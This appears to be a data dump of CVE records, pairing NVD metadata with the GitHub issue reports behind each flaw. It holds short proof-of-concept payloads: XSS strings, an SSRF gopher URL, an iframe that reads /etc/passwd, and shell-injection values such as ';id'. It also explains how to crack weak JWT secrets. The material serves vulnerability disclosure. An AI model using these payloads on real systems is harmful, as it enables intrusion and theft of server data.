"url": "https://github.com/eddy8/LightCMS/issues/18"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "https://www.exploit-db.com/exploits/49598"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/161562/LightCMS-1.3.4-Cross-Site-Scripting.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://gist.github.com/Peithon/1c628ded0c4fc96c6331c3cce1d0c69b"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/eddy8/LightCMS/issues/18"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "https://www.exploit-db.com/exploits/49598"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:lightcms_project:lightcms:1.3.4:*:*:*:*:*:*:*",
"matchCriteriaId": "F82513F0-C30D-4A33-9847-EF0EB278146E",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/eddy8/LightCMS/issues/18 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"eddy8",
"LightCMS"
] | ### Description -
There's no escape being done before printing out the value of `noun`、`verb`、`exclusive` in the SensitiveWords page.
### LightCMS version - v1.3.4
### Steps to reproduce -
- Navigate to http://lightcms.bituier.com/admin/login & Log in to the background with the account admin and password admin
- Navigate to http://lightcms.bituier.com/admin/SensitiveWords/create & add the below-shared payload as the `exclusive` field value.
Payload - `</span><img src=1 onerror=alert(1) /><span>`
- Visit page http://lightcms.bituier.com/admin/SensitiveWords, the payload will be triggered.


| Stored XSS in "exclusive" field - SensitiveWords | https://api.github.com/repos/eddy8/LightCMS/issues/18/comments | 1 | 2021-01-26T06:15:44Z | 2021-02-01T01:08:26Z | https://github.com/eddy8/LightCMS/issues/18 | 793,966,506 | 18 | 1,724 |
CVE-2020-27224 | 2021-02-24T17:15:15.500 | In Eclipse Theia versions up to and including 1.2.0, the Markdown Preview (@theia/preview), can be exploited to execute arbitrary code. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "COMPLETE",
"baseScore": 9.3,
"confidentialityImpact": "COMPLETE",
"integrityImpact": "COMPLETE",
"vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 10,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.6,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "emo@eclipse.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/eclipse-theia/theia/issues/7954"
},
{
"source": "emo@eclipse.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://omespino.com/write-up-google-bug-bounty-xss-to-cloud-shell-instance-takeover-rce-as-root-5000-usd/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/eclipse-theia/theia/issues/7954"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://omespino.com/write-up-google-bug-bounty-xss-to-cloud-shell-instance-takeover-rce-as-root-5000-usd/"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:eclipse:theia:*:*:*:*:*:*:*:*",
"matchCriteriaId": "5B4523BE-7475-4619-B454-5E8D508EB99B",
"versionEndExcluding": null,
"versionEndIncluding": "1.2.0",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/eclipse-theia/theia/issues/7954 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"eclipse-theia",
"theia"
] | ### Bug Description: XSS vulnerability in markdown preview
The Markdown Preview can exploited to execute arbitrary code.
### Steps to Reproduce:
1. Create markdown file and append the following text: <style onload="alert(0)">
2. Save and close the file.
3. Right click the file and select Open With -> Preview
4. Observe the alert has fired.
The root cause of the vulnerability is the current usage of [markdown-it](https://github.com/markdown-it/markdown-it) to [render html](https://github.com/eclipse-theia/theia/blob/fcddb3b78558678f0eff8bc4abeeb4ab046a40d0/packages/preview/src/browser/markdown/markdown-preview-handler.ts#L217) then subsequently adding the output to the DOM via [innerHtml](https://github.com/eclipse-theia/theia/blob/fcddb3b78558678f0eff8bc4abeeb4ab046a40d0/packages/preview/src/browser/markdown/markdown-preview-handler.ts#L56) without sanitizing. Moreover, there are several potential xss sinks within the Theia code base that could potentially be exploited in a similar fashion (e.g. [innerHtml](https://github.com/eclipse-theia/theia/blob/fcddb3b78558678f0eff8bc4abeeb4ab046a40d0/packages/plugin-ext/src/main/browser/plugin-icon-theme-service.ts#L165), [dangerouslySetInnerHtml](https://github.com/eclipse-theia/theia/blob/1ca3ec37c079a6b316278cf292609653e57b8151/packages/messages/src/browser/notification-component.tsx#L76)). Would the community be open to accepting contributions to mitigate these vulnerabilities, and accompanying lint rules that would bar future usages of xss sinks?
### Additional Information
- Operating System: Linux
- Theia Version: 1.2.0
| [security] XSS vulnerability in markdown preview | https://api.github.com/repos/eclipse-theia/theia/issues/7954/comments | 16 | 2020-06-03T20:15:17Z | 2021-02-24T16:51:43Z | https://github.com/eclipse-theia/theia/issues/7954 | 630,295,523 | 7,954 | 1,725 |
CVE-2020-23534 | 2021-02-25T16:15:12.150 | A server-side request forgery (SSRF) vulnerability in Upgrade.php of gopeak masterlab 2.1.5, via the 'source' parameter. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/gopeak/masterlab/issues/254"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/gopeak/masterlab/issues/254"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:masterlab:masterlab:2.1.5:*:*:*:*:*:*:*",
"matchCriteriaId": "EE09F1E6-3590-44E1-AA92-A3E594219236",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"918"
] | 918 | https://github.com/gopeak/masterlab/issues/254 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"gopeak",
"masterlab"
] | 这里输入对bug做出清晰简洁的描述.
Vulnerability file path:/app/ctrl/Upgrade.php

POC:
http://192.168.222.123/Upgrade/run?source=gopher://192.168.31.103:1234/_Hello

1. xx
2. xxx
3. xxxx
4. xxxxxx
**期望结果**
简洁清晰的描述期望结果
**实际结果**
简述实际看到的结果,这里可以配上截图
**附加说明**
附加或额外的信息
| SSRF exists in the background | https://api.github.com/repos/gopeak/masterlab/issues/254/comments | 3 | 2020-06-04T13:00:59Z | 2020-06-16T03:06:54Z | https://github.com/gopeak/masterlab/issues/254 | 630,800,234 | 254 | 1,726 |
CVE-2021-23345 | 2021-02-26T18:15:12.330 | All versions of package github.com/thecodingmachine/gotenberg are vulnerable to Server-side Request Forgery (SSRF) via the /convert/html endpoint when the src attribute of an HTML element refers to an internal system file, such as <iframe src='file:///etc/passwd'>. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 1.4,
"source": "report@snyk.io",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 1.4,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "report@snyk.io",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/thecodingmachine/gotenberg/issues/261"
},
{
"source": "report@snyk.io",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://snyk.io/vuln/SNYK-GOLANG-GITHUBCOMTHECODINGMACHINEGOTENBERG-1062043"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/thecodingmachine/gotenberg/issues/261"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://snyk.io/vuln/SNYK-GOLANG-GITHUBCOMTHECODINGMACHINEGOTENBERG-1062043"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:thecodingmachine:gotenberg:*:*:*:*:*:*:*:*",
"matchCriteriaId": "04B8DDEA-4AE8-45F2-9FF8-77E45DACD9A0",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"918"
] | 918 | https://github.com/thecodingmachine/gotenberg/issues/261 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"thecodingmachine",
"gotenberg"
] | ## Expected Behavior
- When attempting to convert html into a PDF using the /html endpoint, gotenberg should throw an exception (respond with a bad request) whenever there is an attempt to convert html with a source (src) reference to an internal system file.
- [HTTP POST] /convert/html
- [BODY] file: index.html >> test blank html <iframe src='file:///etc/passwd'>
- [RESPONSE] 400 Bad Request (request was improperly formed - or something similar)
## Current Behavior
- [HTTP POST] /convert/html
- [BODY] file: index.html >> test blank html <iframe src='file:///etc/passwd'>
- [RESPONSE] (contents of the etc/password directory


## Possible Solution
- Respond with a bad request. Or something that indicates the requested operation is not allowed or prohibited.
- Check the contents of the HTML file being uploaded to determine if similar file:// protocols are referenced
The use of server-side requests must be limited to specific scenarios required by the application and servers must be hardened to only allow those requests. SSRF can be remediated using a variety of standard web application protections, such as:
1. Limit service types via input validation on user input: Analyze if the application must use URI/ URL in requests and if not, disallow them. When a use case requires URIs and URLs in requests, perform input validation on URI/URLs using whitelists or robust blacklists. For example, only allow URL schemes such as HTTP/HTTPS which are often required for accessing applications. Disable all other URL schemas such as file://, dict://, gopher://, ftp://. Alternatively, create a token based forwarding for SSRs which may eliminate the use of URIs altogether.
2. Limit service interactions: Carefully analyze if the server requires interactions with external servers. Based on the use case, prevent unintended behavior in one of the following ways: External service interactions required: If the server is to perform interactions with external services, the server must be hardened to safely eliminate calls to services available on the local loopback adapter and prevent any calls from the server to other internal systems.
3. External service interactions not required: If the server is to only interact with local services, configure outbound firewall rules to check any calls being made from the application. The rules must limit the web server's interaction with other hosts by routing traffic only to specified resources on the local network; i.e., web servers must disallow connections to any host not included in the whitelist.
## Steps to Reproduce (for bugs)
1. Configure Postman to use a proxy tool such as Burp Suite.
2. Create an HTML file using the below data: test blank html <iframe src='file:///etc/passwd'>
3. Toggle Burp Intercept on.
4. Upload this HTML file and make a request to the "Converter" endpoint.
5. Forward the intercepted request to Repeater and hit send.
6. In Repeater > response section, right click and select "show response in browser".
7. Open the response in a browser.
8. Note that the PDF file contains contents of /etc/passwd file.


## Context
- We'd like to hide information about the server and not allow attackers to steal sensitive data
## Your Environment
- Azure
- Linux Container
- OS version: Unix 4.15.0.112
- 64 bit system: True
- 64 bit process: True
- Processor count: 1
| Server-Side Request Forgery <iframe src='file:///etc/passwd'> (in version 6.3.0) | https://api.github.com/repos/gotenberg/gotenberg/issues/261/comments | 8 | 2020-11-24T19:30:47Z | 2021-08-22T15:13:47Z | https://github.com/gotenberg/gotenberg/issues/261 | 749,979,322 | 261 | 1,727 |
CVE-2020-36079 | 2021-02-26T23:15:11.187 | Zenphoto through 1.5.7 is affected by authenticated arbitrary file upload, leading to remote code execution. The attacker must navigate to the uploader plugin, check the elFinder box, and then drag and drop files into the Files(elFinder) portion of the UI. This can, for example, place a .php file in the server's uploaded/ directory. NOTE: the vendor disputes this because exploitation can only be performed by an admin who has "lots of other possibilities to harm a site. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.2,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/161569/Zenphoto-CMS-1.5.7-Shell-Upload.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/zenphoto/zenphoto/issues/1292"
},
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "https://www.zenphoto.org/news/why-not-every-security-issue-is-really-an-issue/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/161569/Zenphoto-CMS-1.5.7-Shell-Upload.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/zenphoto/zenphoto/issues/1292"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://www.zenphoto.org/news/why-not-every-security-issue-is-really-an-issue/"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:zenphoto:zenphoto:*:*:*:*:*:*:*:*",
"matchCriteriaId": "776AEF1F-758A-4080-BBB9-FDE3020D499A",
"versionEndExcluding": null,
"versionEndIncluding": "1.5.7",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"434"
] | 434 | https://github.com/zenphoto/zenphoto/issues/1292 | [
"Third Party Advisory"
] | github.com | [
"zenphoto",
"zenphoto"
] | [CVE-2020-36079](https://nvd.nist.gov/vuln/detail/CVE-2020-36079) vulnerability description is:
```
Zenphoto through 1.5.7 is affected by authenticated arbitrary file upload, leading to remote code execution. The attacker must navigate to the uploader plugin, check the elFinder box, and then drag and drop files into the Files(elFinder) portion of the UI. This can, for example, place a .php file in the server's uploaded/ directory.
```
Am I correct that this is not a vulnerability and needs admin privileges (or special permissions for regular users) and that the software is intended to behave in this manner? | CVE-2020-36079 clarification needed | https://api.github.com/repos/zenphoto/zenphoto/issues/1292/comments | 2 | 2021-02-28T15:14:45Z | 2021-03-03T09:25:56Z | https://github.com/zenphoto/zenphoto/issues/1292 | 818,230,210 | 1,292 | 1,728 |
CVE-2021-27884 | 2021-03-01T23:15:13.267 | Weak JSON Web Token (JWT) signing secret generation in YMFE YApi through 1.9.2 allows recreation of other users' JWT tokens. This occurs because Math.random in Node.js is used. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 3.6,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 3.9,
"impactScore": 4.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "NONE",
"baseScore": 5.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.5,
"impactScore": 2.5,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/YMFE/yapi/issues/2117"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://securitylab.github.com/advisories/GHSL-2020-228-YMFE-yapi"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/YMFE/yapi/issues/2117"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://securitylab.github.com/advisories/GHSL-2020-228-YMFE-yapi"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:ymfe:yapi:*:*:*:*:*:*:*:*",
"matchCriteriaId": "D457FF7A-2FFE-425F-A0B8-C6F292C4DA10",
"versionEndExcluding": null,
"versionEndIncluding": "1.9.2",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"330"
] | 330 | https://github.com/YMFE/yapi/issues/2117 | [
"Third Party Advisory"
] | github.com | [
"YMFE",
"yapi"
] | ## Summary
Weak random number generator is used to sign JSON Web Token (JWT).
## Product
[YApi](https://github.com/YMFE/yapi)
## Tested Version
The latest commit to the date: [8e1f654](https://github.com/YMFE/yapi/tree/8e1f6546d52ad6a3f8d3ce3325eb1d0276209f4c).
## Details
### JWT signing
Function [randStr](https://github.com/YMFE/yapi/blob/8e1f6546d52ad6a3f8d3ce3325eb1d0276209f4c/server/utils/commons.js#L155-L159) is using a cryptographically insecure pseudo-random number generator `Math.random` to create a randomly looking string that later is used to sign and verify issued tokens:
```js
exports.randStr = () => {
return Math.random()
.toString(36)
.substr(2);
};
```
When a new user is created the `randStr` function is used to generate a `passsalt`. It is used as a salt to hash the password and as the secret to sign a JWT that authenticates the user:
```js
async reg(ctx) {
...
let passsalt = yapi.commons.randStr();
let data = {
username: params.username,
password: yapi.commons.generatePassword(params.password, passsalt), //加密
email: params.email,
passsalt: passsalt,
...
this.setLoginCookie(user._id, user.passsalt);
...
}
...
setLoginCookie(uid, passsalt) {
let token = jwt.sign({ uid: uid }, passsalt, { expiresIn: '7 days' });
this.ctx.cookies.set('_yapi_token', token, {
expires: yapi.commons.expireDate(7),
httpOnly: true
});
...
}
```
The `Math.random` returns a floating-point number that is more than or equal to 0.0 and less than 1.0. The call to `toString(36)` formats the number as base36. For example, `0.19280841320093556` gets encoded as `0.6xvo3g36129`. The first two characters are trimmed and the result is `6xvo3g36129`. The generated secret is mostly 10-12 characters long and consists of numbers and lowercase Latin alphabet characters only. Since the trimmed part is always `0.` the calculation is completely reversible.
The weakness of cryptographically insecure pseudo-random number generators is that given some number of observed values the internal state of the generator can be recreated that reveals the numbers generated in the past or allows calculation of the future outputs. The internal state of the current implementation of `Math.random` in Node.js (a modification of XorShift128+ algorithm) can be recreated from three observed consecutive values.
To get the values an attacker may automate the user creation process to get three new user tokens rapidly, then run a brute force attack on the JWT HMAC signatures. This still should not be feasible to do in a reasonable time on a single machine like:
```
- Hashcat version: 6.1.1
- Nvidia GPUs: 4 * Tesla V100
Hashmode: 16500 - JWT (JSON Web Token)
Speed.#1.........: 1368.5 MH/s (244.80ms) @ Accel:32 Loops:128 Thr:1024 Vec:1
Speed.#2.........: 1368.9 MH/s (244.65ms) @ Accel:32 Loops:128 Thr:1024 Vec:1
Speed.#3.........: 1368.2 MH/s (244.80ms) @ Accel:32 Loops:128 Thr:1024 Vec:1
Speed.#4.........: 1368.3 MH/s (244.74ms) @ Accel:32 Loops:128 Thr:1024 Vec:1
Speed.#*.........: 5473.9 MH/s
```
However a very rough estimation shows that by using cloud computing the attack could cost from 8 000$ to 24 000$ to break the tokens (Cracking three values versus one value has very little penalty as cracking machines are optimized for multiple hashes and cracking a single hash doesn't fully utilize computer resources). Please notice that the token's 7 days expiration time doesn't put a limit on the attack as the target is the `passsalt` value used to sign the token.
#### Impact
After successfully brute forcing the three pseudo-random values the attacker may recreate the `passsalt` values that are used to sign tokens of other users. It may be argued if there is an incentive to spend this amount of resources, but GPUs get better all the time.
#### Remediation
Use `crypto.randomBytes` to get at least 32 bytes random value in `randStr`. Consider not using the `passsalt` for signing JWT, but using a 256 bits secret from the server configuration environment.
## Credit
This issue was discovered and reported by GHSL team member [@JarLob (Jaroslav Lobačevski)](https://github.com/JarLob).
## Contact
You can contact the GHSL team at `securitylab@github.com`, please include a reference to `GHSL-2020-228` in any communication regarding this issue.
## Disclosure Policy
Our [coordinated disclosure policy](https://securitylab.github.com/advisories#policy). | GitHub Security Lab (GHSL) Vulnerability Report: `GHSL-2020-228` | https://api.github.com/repos/YMFE/yapi/issues/2117/comments | 0 | 2021-02-23T14:55:07Z | 2021-02-23T14:57:23Z | https://github.com/YMFE/yapi/issues/2117 | 814,540,386 | 2,117 | 1,729 |
CVE-2021-27886 | 2021-03-02T00:15:18.097 | rakibtg Docker Dashboard before 2021-02-28 allows command injection in backend/utilities/terminal.js via shell metacharacters in the command parameter of an API request. NOTE: this is NOT a Docker, Inc. product. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/163416/Docker-Dashboard-Remote-Command-Execution.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/rakibtg/docker-web-gui/commit/79cdc41809f2030fce21a1109898bd79e4190661"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/rakibtg/docker-web-gui/issues/23"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://www.docker.com/legal/trademark-guidelines"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/163416/Docker-Dashboard-Remote-Command-Execution.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/rakibtg/docker-web-gui/commit/79cdc41809f2030fce21a1109898bd79e4190661"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/rakibtg/docker-web-gui/issues/23"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://www.docker.com/legal/trademark-guidelines"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:docker_dashboard_project:docker_dashboard:*:*:*:*:*:*:*:*",
"matchCriteriaId": "44392BD7-3321-4E6C-AF23-CFE01B6FE298",
"versionEndExcluding": "2021-02-28",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"78"
] | 78 | https://github.com/rakibtg/docker-web-gui/issues/23 | [
"Third Party Advisory"
] | github.com | [
"rakibtg",
"docker-web-gui"
] | For example, making GET requests such as the following results in arbitrary commands being executed on the server, outside of the intended docker process only. This is otherwise known as a remote command injection bug (especially since app.js listens on the network interface by default, accessible by anyone on the network, even though the intended access is localhost).
> https://github.com/rakibtg/docker-web-gui/blob/master/backend/controllers/ContainerController.js#L40
```
/api/container/command?container=&command=;uname%20-a
/api/image/command?image=&command=;id
```
For example executing the id command may return:
```
uid=1000(test) gid=1000(test) groups=1000(test),133(docker)
```
Some of the other APIs seem vulnerable to injection as well.
Recommended easiest fix would be the following
1) allow only alphanumeric characters in the parameters (strings that actually look like container and image names)
